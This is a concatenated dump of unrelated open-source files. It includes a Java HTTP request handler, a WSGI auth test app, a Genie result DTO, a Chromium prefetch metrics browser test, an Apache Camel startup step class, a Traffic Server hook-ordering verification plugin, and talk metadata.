void app_spp_register_connect_callback(struct spp_device *osDev_t, spp_event_callback_t callback);
void app_spp_register_disconnect_callback(struct spp_device *osDev_t, spp_event_callback_t callback);
void app_spp_register_tx_done(struct spp_device *osDev_t, spp_event_callback_t callback);
#endif
bt_status_t app_spp_send_data(struct spp_device *osDev_t, uint8_t* ptrData, uint16_t *length);
void app_spp_open(struct spp_device *osDev_t, btif_remote_device_t *btDevice, btif_sdp_record_param_t *param, osMutexId mid, uint8_t service_id, spp_callback_t callback);
#ifdef __cplusplus
}
#endif
#endif
| 1,296 |
482 | <reponame>hginzel/Prana<filename>src/main/java/com/netflix/prana/http/api/AbstractRequestHandler.java
/*
* Copyright 2014 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.prana.http.api;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.netflix.prana.http.Context;
import com.netflix.prana.internal.DefaultContext;
import io.netty.buffer.ByteBuf;
import io.reactivex.netty.protocol.http.server.HttpServerRequest;
import io.reactivex.netty.protocol.http.server.HttpServerResponse;
import io.reactivex.netty.protocol.http.server.RequestHandler;
import rx.Observable;
public abstract class AbstractRequestHandler implements RequestHandler<ByteBuf, ByteBuf> {
private final ObjectMapper objectMapper;
protected AbstractRequestHandler(ObjectMapper objectMapper) {
this.objectMapper = objectMapper;
}
abstract Observable<Void> handle(Context context);
@Override
public Observable<Void> handle(HttpServerRequest<ByteBuf> request, final HttpServerResponse<ByteBuf> response) {
DefaultContext context = new DefaultContext(request, response, objectMapper);
return handle(context);
}
}
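
An illustrative subclass, not from the Prana codebase: because the abstract handle(Context) method is package-private, a concrete handler lives in the same package and supplies the per-request behaviour. The Observable.empty() body is a placeholder, since the Context API surface is not shown here.

package com.netflix.prana.http.api;

import com.fasterxml.jackson.databind.ObjectMapper;
import com.netflix.prana.http.Context;
import rx.Observable;

public class NoOpRequestHandler extends AbstractRequestHandler {

    public NoOpRequestHandler(ObjectMapper objectMapper) {
        super(objectMapper);
    }

    @Override
    Observable<Void> handle(Context context) {
        // A real handler would write a response through the Context helpers;
        // completing with an empty Observable simply ends the request without a body.
        return Observable.empty();
    }
}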
| 514 |
5,079 | <reponame>kokosing/hue
def tack_environ(environ, msg):
import pprint
penv = pprint.pformat(environ)
return msg + '\n\n' + penv
def deny(start_response, environ, msg):
    ct = 'text/plain'
    msg = tack_environ(environ, msg)
    cl = str(len(msg))
    start_response('401 Unauthorized',
                   [ ('Content-Type', ct),
                     ('Content-Length', cl) ],
                   )
    # Return the body so the caller yields a complete WSGI response.
    return [msg]
def allow(start_response, environ, msg):
ct = 'text/plain'
msg = tack_environ(environ, msg)
cl = str(len(msg))
start_response('200 OK',
[ ('Content-Type', ct),
('Content-Length', cl) ],
)
return [msg]
def app(environ, start_response):
path_info = environ['PATH_INFO']
remote_user = environ.get('REMOTE_USER')
if path_info.endswith('/shared'):
if not remote_user:
            return deny(start_response, environ, "You can't do that")
else:
return allow(start_response, environ,
'Welcome to the shared area, %s' % remote_user)
elif path_info.endswith('/admin'):
if remote_user != 'admin':
return deny(start_response, environ, 'Only admin can do that')
else:
return allow(start_response, environ, 'Hello, admin!')
elif path_info.endswith('/chris'):
if remote_user != 'chris':
return deny(start_response, environ, 'Only chris can do that')
else:
return allow(start_response, environ, 'Hello, chris!')
else:
return allow(start_response, environ, 'Unprotected page')
def make_app(global_config, **kw):
return app
| 834 |
1,420 | /*
*
* Copyright 2019 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*/
package com.netflix.genie.agent.execution.process;
import com.netflix.genie.common.external.dtos.v4.JobStatus;
import lombok.EqualsAndHashCode;
import lombok.Getter;
import lombok.ToString;
/**
* A DTO POJO to capture final information about the job process this agent process was responsible for.
*
* @author tgianos
* @since 4.0.0
*/
@Getter
@EqualsAndHashCode(doNotUseGetters = true)
@ToString(doNotUseGetters = true)
@SuppressWarnings("FinalClass")
public class JobProcessResult {
private final JobStatus finalStatus;
private final String finalStatusMessage;
private final long stdOutSize;
private final long stdErrSize;
private final int exitCode;
private JobProcessResult(final Builder builder) {
this.finalStatus = builder.bFinalStatus;
this.finalStatusMessage = builder.bFinalStatusMessage;
this.stdOutSize = builder.bStdOutSize;
this.stdErrSize = builder.bStdErrSize;
this.exitCode = builder.bExitCode;
}
/**
* A builder to create valid, immutable {@link JobProcessResult} instances.
*
* @author tgianos
* @since 4.0.0
*/
public static class Builder {
private final JobStatus bFinalStatus;
private final String bFinalStatusMessage;
private final int bExitCode;
private long bStdOutSize;
private long bStdErrSize;
/**
* Constructor.
*
* @param finalStatus The final {@link JobStatus} for the job. {@link JobStatus#isFinished()} must return
* true
* @param finalStatusMessage The final human readable message for the job status
* @param exitCode The process exit code
* @throws IllegalArgumentException When {@literal finalStatus} is not a final status
*/
public Builder(
final JobStatus finalStatus,
final String finalStatusMessage,
final int exitCode
) throws IllegalArgumentException {
if (!finalStatus.isFinished()) {
throw new IllegalArgumentException(
"finalStatus must be one of the final states: "
+ JobStatus.getFinishedStatuses()
+ ". Was "
                        + finalStatus
);
}
this.bFinalStatus = finalStatus;
this.bFinalStatusMessage = finalStatusMessage;
this.bExitCode = exitCode;
}
/**
* Set the length of the std out file in bytes if there was one.
*
* @param stdOutSize The length of the std out file in bytes
* @return This builder object
*/
public Builder withStdOutSize(final long stdOutSize) {
this.bStdOutSize = Math.max(stdOutSize, 0L);
return this;
}
/**
* Set the length of the std error file in bytes if there was one.
*
* @param stdErrSize The length of the std error file in bytes
* @return This builder object
*/
public Builder withStdErrSize(final long stdErrSize) {
this.bStdErrSize = Math.max(stdErrSize, 0L);
return this;
}
/**
* Create a new immutable {@link JobProcessResult} instance based on the current contents of this builder.
*
* @return A {@link JobProcessResult} instance
*/
public JobProcessResult build() {
return new JobProcessResult(this);
}
}
}
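
A minimal builder usage sketch, not from the Genie sources; it assumes JobStatus.SUCCEEDED is one of the finished statuses accepted by the constructor.

import com.netflix.genie.agent.execution.process.JobProcessResult;
import com.netflix.genie.common.external.dtos.v4.JobStatus;

public class JobProcessResultExample {
    public static void main(String[] args) {
        // The constructor rejects non-final statuses with an IllegalArgumentException.
        JobProcessResult result = new JobProcessResult.Builder(
                JobStatus.SUCCEEDED, "Job exited normally", 0)
                .withStdOutSize(4096L)
                .withStdErrSize(0L)
                .build();

        System.out.println(result.getFinalStatus() + " exit=" + result.getExitCode());
    }
}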
| 1,726 |
568 | <reponame>kayleyang/jim-framework<filename>jim-framework-cloud-registry/src/main/java/com/jim/framework/cloud/registry/RegistryApplication.java
package com.jim.framework.cloud.registry;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.boot.builder.SpringApplicationBuilder;
import org.springframework.cloud.netflix.eureka.server.EnableEurekaServer;
@SpringBootApplication
@EnableEurekaServer
public class RegistryApplication {
public static void main(String[] args) {
new SpringApplicationBuilder(RegistryApplication.class).web(true).run(args);
}
}
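// Configuration sketch (hypothetical application.yml, not part of this repository):
// a standalone registry typically disables self-registration and registry fetching.
//
//     server:
//       port: 8761
//     eureka:
//       client:
//         register-with-eureka: false
//         fetch-registry: false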
| 178 |
4,036 | <reponame>vadi2/codeql
enum Type { S, I };
struct Entry {
char* name;
Type t;
char* s;
int i;
};
union Value {
char* s;
int i;
};
struct EntryWithMethod: Entry {
int getAsInt() {
return i;
}
};
void myFunction()
{
union MyLocalUnion {
int i;
float f;
};
}
class MyClass
{
public:
union MyNestedUnion {
int i;
float f;
};
};
| 168 |
14,668 | // Copyright 2019 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "chrome/browser/page_load_metrics/observers/prefetch_proxy_page_load_metrics_observer.h"
#include <memory>
#include "base/command_line.h"
#include "base/test/metrics/histogram_tester.h"
#include "build/build_config.h"
#include "chrome/browser/ui/browser.h"
#include "chrome/test/base/in_process_browser_test.h"
#include "chrome/test/base/ui_test_utils.h"
#include "components/data_reduction_proxy/core/common/data_reduction_proxy_switches.h"
#include "components/ukm/test_ukm_recorder.h"
#include "content/public/test/browser_test.h"
#include "content/public/test/prerender_test_util.h"
#include "net/dns/mock_host_resolver.h"
#include "net/http/http_request_headers.h"
#include "net/http/http_status_code.h"
#include "net/test/embedded_test_server/embedded_test_server.h"
#include "net/test/embedded_test_server/embedded_test_server_connection_listener.h"
#include "net/test/embedded_test_server/http_request.h"
#include "net/test/embedded_test_server/http_response.h"
#include "services/metrics/public/cpp/ukm_builders.h"
#include "services/metrics/public/cpp/ukm_source.h"
#include "testing/gtest/include/gtest/gtest.h"
class PrefetchProxyPageLoadMetricsObserverBrowserTest
: public InProcessBrowserTest {
public:
PrefetchProxyPageLoadMetricsObserverBrowserTest() = default;
~PrefetchProxyPageLoadMetricsObserverBrowserTest() override = default;
void SetUpOnMainThread() override {
InProcessBrowserTest::SetUpOnMainThread();
host_resolver()->AddRule("*", "127.0.0.1");
embedded_test_server()->ServeFilesFromSourceDirectory(
"chrome/test/data/subresource_loading");
ASSERT_TRUE(embedded_test_server()->Start());
ukm_recorder_ = std::make_unique<ukm::TestAutoSetUkmRecorder>();
}
void NavigateTo(const GURL& url) {
ASSERT_TRUE(ui_test_utils::NavigateToURL(browser(), url));
base::RunLoop().RunUntilIdle();
}
void NavigateToOriginPath(const std::string& path) {
ASSERT_TRUE(ui_test_utils::NavigateToURL(
browser(), embedded_test_server()->GetURL("origin.com", path)));
base::RunLoop().RunUntilIdle();
}
void NavigateAway() {
ASSERT_TRUE(
ui_test_utils::NavigateToURL(browser(), GURL(url::kAboutBlankURL)));
base::RunLoop().RunUntilIdle();
}
void VerifyNoUKM() {
auto entries = ukm_recorder_->GetEntriesByName(
ukm::builders::PrefetchProxy::kEntryName);
EXPECT_TRUE(entries.empty());
}
void VerifyUKMEntry(const std::string& metric_name,
absl::optional<int64_t> expected_value) {
auto entries = ukm_recorder_->GetEntriesByName(
ukm::builders::PrefetchProxy::kEntryName);
ASSERT_EQ(1U, entries.size());
const auto* entry = entries.front();
ukm_recorder_->ExpectEntrySourceHasUrl(
entry, embedded_test_server()->GetURL("origin.com", "/index.html"));
const int64_t* value =
ukm::TestUkmRecorder::GetEntryMetric(entry, metric_name);
EXPECT_EQ(value != nullptr, expected_value.has_value());
if (!expected_value.has_value())
return;
EXPECT_EQ(*value, expected_value.value());
}
GURL GetOriginURL(const std::string& path) {
return embedded_test_server()->GetURL("origin.com", path);
}
private:
std::unique_ptr<ukm::TestAutoSetUkmRecorder> ukm_recorder_;
};
IN_PROC_BROWSER_TEST_F(PrefetchProxyPageLoadMetricsObserverBrowserTest,
BeforeFCPPlumbing) {
base::HistogramTester histogram_tester;
NavigateToOriginPath("/index.html");
NavigateAway();
histogram_tester.ExpectUniqueSample(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Noncached", 2,
1);
}
// TODO(http://crbug.com/1025737) Flaky on Mac.
#if defined(OS_MAC)
#define MAYBE_HistoryPlumbing DISABLED_HistoryPlumbing
#else
#define MAYBE_HistoryPlumbing HistoryPlumbing
#endif
IN_PROC_BROWSER_TEST_F(PrefetchProxyPageLoadMetricsObserverBrowserTest,
MAYBE_HistoryPlumbing) {
base::HistogramTester histogram_tester;
NavigateToOriginPath("/index.html");
NavigateAway();
histogram_tester.ExpectUniqueSample(
"PageLoad.Clients.SubresourceLoading.HasPreviousVisitToOrigin", false, 1);
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.DaysSinceLastVisitToOrigin", 0);
// Revisit and expect a 0 days-ago entry.
NavigateToOriginPath("/index.html");
NavigateAway();
histogram_tester.ExpectBucketCount(
"PageLoad.Clients.SubresourceLoading.HasPreviousVisitToOrigin", true, 1);
histogram_tester.ExpectBucketCount(
"PageLoad.Clients.SubresourceLoading.HasPreviousVisitToOrigin", false, 1);
histogram_tester.ExpectUniqueSample(
"PageLoad.Clients.SubresourceLoading.DaysSinceLastVisitToOrigin", 0, 1);
}
IN_PROC_BROWSER_TEST_F(PrefetchProxyPageLoadMetricsObserverBrowserTest,
RecordNothingOnUntrackedPage) {
base::HistogramTester histogram_tester;
NavigateAway();
NavigateAway();
VerifyNoUKM();
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.DaysSinceLastVisitToOrigin", 0);
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.HasPreviousVisitToOrigin", 0);
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Cached", 0);
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Noncached", 0);
}
class PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest
: public PrefetchProxyPageLoadMetricsObserverBrowserTest {
public:
PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest()
: prerender_helper_(base::BindRepeating(
&PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest::
GetWebContents,
base::Unretained(this))) {}
~PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest() override =
default;
PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest(
const PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest&) = delete;
PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest& operator=(
const PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest&) = delete;
void SetUp() override {
prerender_helper_.SetUp(embedded_test_server());
PrefetchProxyPageLoadMetricsObserverBrowserTest::SetUp();
}
void SetUpOnMainThread() override {
PrefetchProxyPageLoadMetricsObserverBrowserTest::SetUpOnMainThread();
}
content::test::PrerenderTestHelper& prerender_test_helper() {
return prerender_helper_;
}
content::WebContents* GetWebContents() {
return browser()->tab_strip_model()->GetActiveWebContents();
}
private:
content::test::PrerenderTestHelper prerender_helper_;
};
IN_PROC_BROWSER_TEST_F(PrefetchProxyPageLoadMetricsObserverPrerenderBrowserTest,
PrerenderingShouldNotRecordMetrics) {
base::HistogramTester histogram_tester;
GURL initial_url = embedded_test_server()->GetURL("/redirect_to_index.html");
ASSERT_TRUE(ui_test_utils::NavigateToURL(browser(), initial_url));
// Load a prerender page and prerendering should not increase the total count.
GURL prerender_url = embedded_test_server()->GetURL("/index.html");
int host_id = prerender_test_helper().AddPrerender(prerender_url);
content::test::PrerenderHostObserver host_observer(*GetWebContents(),
host_id);
EXPECT_FALSE(host_observer.was_activated());
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Cached", 0);
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Noncached", 0);
// Activate the prerender page.
prerender_test_helper().NavigatePrimaryPage(prerender_url);
EXPECT_TRUE(host_observer.was_activated());
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Cached", 1);
histogram_tester.ExpectTotalCount(
"PageLoad.Clients.SubresourceLoading.LoadedCSSJSBeforeFCP.Noncached", 1);
}
| 3,047 |
5,169 | <reponame>Ray0218/Specs<filename>Specs/DRGlyphLabel/0.1.0/DRGlyphLabel.podspec.json<gh_stars>1000+
{
"name": "DRGlyphLabel",
"version": "0.1.0",
"summary": "A simple library that allows you to create labels with bitmap fonts in UIKit",
"homepage": "https://github.com/darrarski/DRGlyphLabel-iOS",
"license": "MIT",
"authors": {
"Darrarski": "<EMAIL>"
},
"source": {
"git": "https://github.com/darrarski/DRGlyphLabel-iOS.git",
"tag": "0.1.0"
},
"platforms": {
"ios": "7.0"
},
"source_files": "DRGlyphLabel",
"requires_arc": true
}
| 251 |
1,351 | /**
@file
@brief Plugin to verify the ordering of session and transaction start and
close hooks is correct. Keeps track of statistics about the number of
hooks tracked that are caught and of the number of errors encountered.
@section license License
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
#include <iostream>
#include <set>
#include <sstream>
#include <cstdlib> // for abort
#include <ts/ts.h> // for debug
#include <cinttypes> // for PRIu64
#include <cstring>
// debug messages viewable by setting 'proxy.config.diags.debug.tags'
// in 'records.config'
// debug messages during one-time initialization
static const char DEBUG_TAG_INIT[] = "ssntxnorder_verify.init";
// debug messages on every request serviced
static const char DEBUG_TAG_HOOK[] = "ssntxnorder_verify.hook";
static const char DEBUG_TAG_CLOSE[] = "ssntxnorder_verify.close";
// plugin registration info
static char plugin_name[] = "ssntxnorder_verify";
static char vendor_name[] = "Apache";
static char support_email[] = "<EMAIL>";
// List of started sessions, SSN_START seen, SSN_CLOSE not seen yet.
thread_local std::set<TSHttpSsn> started_ssns;
thread_local int ssn_balance = 0; // +1 on SSN_START, -1 on SSN_CLOSE
// Metadata for active transactions. Stored upon start to persist improper
// closing behavior.
typedef struct started_txn {
uint64_t id;
TSHttpTxn txnp;
TSHttpSsn ssnp; // enclosing session
started_txn(uint64_t id) : id(id) {} // used for lookup on id
started_txn(uint64_t id, TSHttpTxn txnp, TSHttpSsn ssnp) : id(id), txnp(txnp), ssnp(ssnp) {}
} started_txn;
// Comparator functor for transactions. Compare by ID.
struct txn_compare {
bool
operator()(const started_txn &lhs, const started_txn &rhs) const
{
return lhs.id < rhs.id;
}
};
// List of started transactions, TXN_START seen, TXN_CLOSE not seen yet.
thread_local std::set<started_txn, txn_compare> started_txns;
thread_local std::set<started_txn, txn_compare> closed_txns;
thread_local int txn_balance = 0; // +1 on TXN_START -1 on TXN_CLOSE
// Statistics provided by the plugin
static int stat_ssn_close = 0; // number of TS_HTTP_SSN_CLOSE hooks caught
static int stat_ssn_start = 0; // number of TS_HTTP_SSN_START hooks caught
static int stat_txn_close = 0; // number of TS_HTTP_TXN_CLOSE hooks caught
static int stat_txn_start = 0; // number of TS_HTTP_TXN_START hooks caught
static int stat_err = 0; // number of inaccuracies encountered
static int stat_test_done = 0; // Set to 1 when the test is done
// IPC information
static char *ctl_tag = plugin_name; // name is a convenient identifier
static const char ctl_dump[] = "dump"; // output active ssn/txn tables cmd
/**
This function is invoked upon TS_EVENT_LIFECYCLE_MSG. It outputs the
active SSN and TXN tables (the items that have not yet been closed).
Information displayed for transactions:
- TXN ID
- Enclosing SSN ID
- HTTP Protocol Version - 1.0 / 1.1 / 2.0 etc...
Information displayed for sessions:
- SSN ID
*/
static void
dump_tables()
{
TSDebug(DEBUG_TAG_HOOK, "Dumping active session and transaction tables.");
std::stringstream dump("");
dump << std::string(100, '+') << std::endl;
if (started_ssns.empty()) {
dump << "No active sessions could be found." << std::endl;
} else {
// Output for every active session
for (auto started_ssn : started_ssns) {
dump << "Session --> ID: " << started_ssn << std::endl;
}
}
if (started_txns.empty()) {
dump << "No active transactions could be found." << std::endl;
} else {
// Output for every active transaction
for (const auto &it : started_txns) {
dump << "Transaction --> ID: " << it.id << " ; Enclosing SSN ID: " << it.ssnp << " ;" << std::endl;
}
}
dump << std::string(100, '+') << std::endl;
std::cout << dump.str() << std::endl;
}
/**
This function is called on every request and logs session and transaction
start and close events. It is used upon initialization to install the hooks
to the corresponding events. Return value is irrelevant.
*/
static int
handle_order(TSCont contp, TSEvent event, void *edata)
{
TSHttpSsn ssnp; // session data
TSHttpTxn txnp; // transaction data
TSPluginMsg *msgp; // message data
// Find the event that happened
switch (event) {
case TS_EVENT_HTTP_SSN_CLOSE: // End of session
{
ssnp = reinterpret_cast<TSHttpSsn>(edata);
TSDebug(DEBUG_TAG_CLOSE, "event TS_EVENT_HTTP_SSN_CLOSE [ SSNID = %p ]", ssnp);
TSStatIntIncrement(stat_ssn_close, 1);
if (started_ssns.erase(ssnp) == 0) {
      // No record existed for this session
TSDebug(DEBUG_TAG_HOOK, "Session [ SSNID = %p ] closing was not previously started", ssnp);
TSStatIntIncrement(stat_err, 1);
abort();
}
if (--ssn_balance < 0) {
TSDebug(DEBUG_TAG_HOOK, "More sessions have been closed than started.");
TSStatIntIncrement(stat_err, 1);
abort();
}
TSHttpSsnReenable(ssnp, TS_EVENT_HTTP_CONTINUE);
break;
}
case TS_EVENT_HTTP_SSN_START: // Beginning of session
{
ssnp = reinterpret_cast<TSHttpSsn>(edata);
TSDebug(DEBUG_TAG_HOOK, "event TS_EVENT_HTTP_SSN_START [ SSNID = %p ]", ssnp);
TSStatIntIncrement(stat_ssn_start, 1);
if (!started_ssns.insert(ssnp).second) {
// Insert failed. Session already existed in the record.
TSDebug(DEBUG_TAG_HOOK, "Session [ SSNID = %p ] has previously started.", ssnp);
TSStatIntIncrement(stat_err, 1);
abort();
}
++ssn_balance;
TSHttpSsnReenable(ssnp, TS_EVENT_HTTP_CONTINUE);
break;
}
case TS_EVENT_HTTP_TXN_CLOSE: // End of transaction
{
txnp = reinterpret_cast<TSHttpTxn>(edata);
TSDebug(DEBUG_TAG_HOOK, "event TS_EVENT_HTTP_TXN_CLOSE [ TXNID = %" PRIu64 " ]", TSHttpTxnIdGet(txnp));
TSStatIntIncrement(stat_txn_close, 1);
std::set<started_txn>::iterator closed_txn = closed_txns.find(started_txn(TSHttpTxnIdGet(txnp)));
if (closed_txn != closed_txns.end()) {
// Double close?
TSStatIntIncrement(stat_err, 1);
abort();
}
closed_txns.insert(started_txn(TSHttpTxnIdGet(txnp)));
std::set<started_txn>::iterator current_txn = started_txns.find(started_txn(TSHttpTxnIdGet(txnp)));
if (current_txn != started_txns.end() && current_txn->id == TSHttpTxnIdGet(txnp)) {
// Transaction exists.
ssnp = current_txn->ssnp;
if (started_ssns.find(ssnp) == started_ssns.end()) {
// The session of the transaction was either not started, or was
// already closed.
TSDebug(DEBUG_TAG_HOOK,
"Transaction [ TXNID = %" PRIu64 " ] closing not in an "
"active session [ SSNID = %p ].",
current_txn->id, ssnp);
TSStatIntIncrement(stat_err, 1);
abort();
}
started_txns.erase(current_txn); // Stop monitoring the transaction
} else {
      // Transaction does not exist.
TSDebug(DEBUG_TAG_HOOK,
"Transaction [ TXNID = %" PRIu64 " ] closing not "
"previously started.",
TSHttpTxnIdGet(txnp));
TSStatIntIncrement(stat_err, 1);
abort();
}
if (--txn_balance < 0) {
TSDebug(DEBUG_TAG_HOOK, "More transactions have been closed than started.");
TSStatIntIncrement(stat_err, 1);
abort();
}
TSHttpTxnReenable(txnp, TS_EVENT_HTTP_CONTINUE);
break;
}
case TS_EVENT_HTTP_TXN_START: // Beginning of transaction
{
txnp = reinterpret_cast<TSHttpTxn>(edata);
ssnp = TSHttpTxnSsnGet(txnp);
TSDebug(DEBUG_TAG_HOOK, "event TS_EVENT_HTTP_TXN_START [ TXNID = %" PRIu64 " ]", TSHttpTxnIdGet(txnp));
TSStatIntIncrement(stat_txn_start, 1);
started_txn new_txn = started_txn(TSHttpTxnIdGet(txnp), txnp, ssnp);
if (started_ssns.find(ssnp) == started_ssns.end()) {
// Session of the transaction has not started.
TSDebug(DEBUG_TAG_HOOK,
"Transaction [ TXNID = %" PRIu64 " ] starting not in an "
"active session [ SSNID = %p ].",
new_txn.id, ssnp);
TSStatIntIncrement(stat_err, 1);
abort();
}
if (!started_txns.insert(new_txn).second) {
// Insertion failed. Transaction has previously started.
TSDebug(DEBUG_TAG_HOOK, "Transaction [ TXNID = %" PRIu64 " ] has previously started.", new_txn.id);
TSStatIntIncrement(stat_err, 1);
abort();
}
++txn_balance;
TSHttpTxnReenable(txnp, TS_EVENT_HTTP_CONTINUE);
break;
}
case TS_EVENT_LIFECYCLE_MSG: // External trigger, such as traffic_ctl
{
TSDebug(DEBUG_TAG_HOOK, "event TS_EVENT_LIFECYCLE_MSG");
msgp = reinterpret_cast<TSPluginMsg *>(edata); // inconsistency
// Verify message is with the appropriate tag
if (!strcmp(ctl_tag, msgp->tag) && strncmp(ctl_dump, reinterpret_cast<const char *>(msgp->data), strlen(ctl_dump)) == 0) {
dump_tables();
} else {
TSContScheduleOnPool(contp, 0, TS_THREAD_POOL_NET);
}
break;
}
case TS_EVENT_IMMEDIATE:
TSStatIntIncrement(stat_test_done, 1);
break;
  // Any other event is unexpected: abort.
default:
abort();
break;
}
return 0;
}
/**
Entry point for the plugin.
- Attaches global hooks for session start and close.
- Attaches global hooks for transaction start and close.
- Attaches lifecycle hook for communication through traffic_ctl
- Initializes all statistics as described in the README
*/
void
TSPluginInit(int argc, const char *argv[])
{
TSDebug(DEBUG_TAG_INIT, "initializing plugin");
TSPluginRegistrationInfo info;
info.plugin_name = plugin_name;
info.vendor_name = vendor_name;
info.support_email = support_email;
if (TSPluginRegister(&info) != TS_SUCCESS) {
TSDebug(DEBUG_TAG_HOOK, "[%s] Plugin registration failed. \n", plugin_name);
}
TSCont contp = TSContCreate(handle_order, TSMutexCreate());
if (contp == nullptr) {
// Continuation initialization failed. Unrecoverable, report and exit.
TSDebug(DEBUG_TAG_HOOK, "[%s] could not create continuation", plugin_name);
abort();
} else {
// Continuation initialization succeeded.
stat_ssn_start = TSStatCreate("ssntxnorder_verify.ssn.start", TS_RECORDDATATYPE_INT, TS_STAT_NON_PERSISTENT, TS_STAT_SYNC_SUM);
stat_ssn_close = TSStatCreate("ssntxnorder_verify.ssn.close", TS_RECORDDATATYPE_INT, TS_STAT_NON_PERSISTENT, TS_STAT_SYNC_SUM);
stat_txn_start = TSStatCreate("ssntxnorder_verify.txn.start", TS_RECORDDATATYPE_INT, TS_STAT_NON_PERSISTENT, TS_STAT_SYNC_SUM);
stat_txn_close = TSStatCreate("ssntxnorder_verify.txn.close", TS_RECORDDATATYPE_INT, TS_STAT_NON_PERSISTENT, TS_STAT_SYNC_SUM);
stat_err = TSStatCreate("ssntxnorder_verify.err", TS_RECORDDATATYPE_INT, TS_STAT_NON_PERSISTENT, TS_STAT_SYNC_SUM);
stat_test_done = TSStatCreate("ssntxnorder_verify.test.done", TS_RECORDDATATYPE_INT, TS_STAT_NON_PERSISTENT, TS_STAT_SYNC_SUM);
// Add all hooks.
TSHttpHookAdd(TS_HTTP_SSN_START_HOOK, contp);
TSHttpHookAdd(TS_HTTP_SSN_CLOSE_HOOK, contp);
TSHttpHookAdd(TS_HTTP_TXN_START_HOOK, contp);
TSHttpHookAdd(TS_HTTP_TXN_CLOSE_HOOK, contp);
TSLifecycleHookAdd(TS_LIFECYCLE_MSG_HOOK, contp);
}
}
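// Example trigger for the table dump (hypothetical invocation; assumes the
// traffic_ctl "plugin msg" subcommand is available in this build):
//
//     traffic_ctl plugin msg ssntxnorder_verify dump
//
// This delivers a TS_EVENT_LIFECYCLE_MSG with tag "ssntxnorder_verify" and data
// "dump" to handle_order(), which calls dump_tables() to print the active session
// and transaction tables.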
| 4,752 |
4,262 | <gh_stars>1000+
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.camel.support.startup;
import org.apache.camel.StartupStep;
public class DefaultStartupStep implements StartupStep {
private final String type;
private final String name;
private final String description;
private final int id;
private final int parentId;
private final int level;
private final long time;
public DefaultStartupStep(String type, String name, String description, int id, int parentId, int level, long time) {
this.type = type;
this.name = name;
this.description = description;
this.id = id;
this.parentId = parentId;
this.level = level;
this.time = time;
}
@Override
public String getType() {
return type;
}
@Override
public String getName() {
return name;
}
@Override
public String getDescription() {
return description;
}
@Override
public int getId() {
return id;
}
@Override
public int getParentId() {
return parentId;
}
@Override
public int getLevel() {
return level;
}
@Override
public long getBeginTime() {
return time;
}
@Override
public void endStep() {
// noop
}
}
| 705 |
435 | {
"description": "<NAME> famously quipped that \u201cThe Web is 95% Typography.\u201d\nMost of the information we take in on the web is textual in nature. It\nbehooves us, as writers and curators of text, to know about the art and\nscience of presenting textual information.\n\nThis talk isn\u2019t about art, or science, but technique. Typesetting has a\nrich history, dating back to Mr. Gutenberg and his printing press.\nAlthough digital type is fairly mature by now, type on the web is still\nvery much in its infancy. We are only now gaining typographical controls\nthat the publishing industry has taken for granted these last 20 years.\nI'll be taking you on tour of the current state of type on the web: what\nwe can do today, and what we will be able to do tomorrow.\n\nSome highlights: \\_ A reintroduction to font-face and the nitty-gritty\ndetails of how it works \\_ Advanced typography with CSS3 font-features\n(http://caniuse.com/#feat=font-feature) \\_ Icon fonts, and semantic use\nthereof \\_ JavaScript tools like fittext.js and lettering.js\n",
"duration": 2077,
"recorded": "2014-05-14",
"speakers": [
"<NAME>"
],
